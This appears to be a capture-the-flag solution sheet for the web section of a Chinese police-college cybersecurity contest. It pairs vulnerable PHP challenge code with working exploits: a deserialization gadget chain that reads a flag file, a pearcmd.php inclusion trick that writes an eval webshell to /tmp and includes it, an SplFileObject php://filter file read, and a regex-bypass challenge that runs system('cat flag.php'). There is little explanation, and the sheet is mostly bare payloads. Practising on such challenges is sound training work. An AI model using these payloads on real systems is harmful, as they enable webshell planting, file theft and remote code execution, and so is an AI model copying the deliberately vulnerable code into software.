黄河流域公安院校网络空间安全技能挑战赛-WEB部分

<?php
error_reporting(0);

class A{
    public $sdpc = ["welcome" => "yeah, something hidden."];

    function __call($name, $arguments)
    {
        $this->$name[$name]();
    }

}


class B{
    public $a;

    function __construct()
    {
        $this->a = new A();
    }

    function __toString()
    {
        echo $this->a->sdpc["welcome"]; //对大家表示欢迎
    }

}

class C{
    public $b;
    protected $c;

    function __construct(){
        $this->c = new B();
    }

    function __destruct(){
        $this->b ? $this->c->sdpc('welcom') : 'welcome!'.$this->c; //变着法欢迎大家
    }
}

class Evil{
    function getflag() {
        echo file_get_contents('/fl4g');
    }
}


if(isset($_POST['sdpc'])) {
    unserialize($_POST['sdpc']);
} else {
    serialize(new C());
}


?>

<?php
error_reporting(0);

class A{
    public $sdpc = ["sdpc" => ["Evil","getflag"]];


}


class C{
    public $b;
    protected $c;

    function __construct(){
        $this->c = new A();
        $this->b =true;
    }

}

echo urlencode(serialize(new C))

?>

<?php
error_reporting(0);
highlight_file(__FILE__);
if(!preg_match("/data|base64|filter|rot13|input/i",$_GET['sdpc']) && isset($_GET['sdpc'])){
    include($_GET['sdpc']);
}else{
    die("sry");
} sry

?+config-create+/&sdpc=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST['cmd']);?>+/tmp/test.php

?sdpc=file:///tmp/test.php

<?php
error_reporting(0);
highlight_file(__FILE__);
$g = $_GET['g'];
$t = $_GET['t'];
echo new $g($t);

?g=SplFileObject&t=php://filter/read=convert.base64-encode/resource=flag.php

<?php
$flag = "flag{d732eea0-63dc-4909-a9b0-a639d8e18aa6}";
?>

<?php
highlight_file(__FILE__);
error_reporting(0);

$num = $_GET['num'];

if (preg_match("/\'|\"|\`| |<|>|?|\^|%|\$/", $num)) {
           die("nononno");
}

if (eval("return ${num} != 2;") && $num == 0 && is_numeric($num) != true) {
 system('cat flag.php');
} else {
 echo '2';
}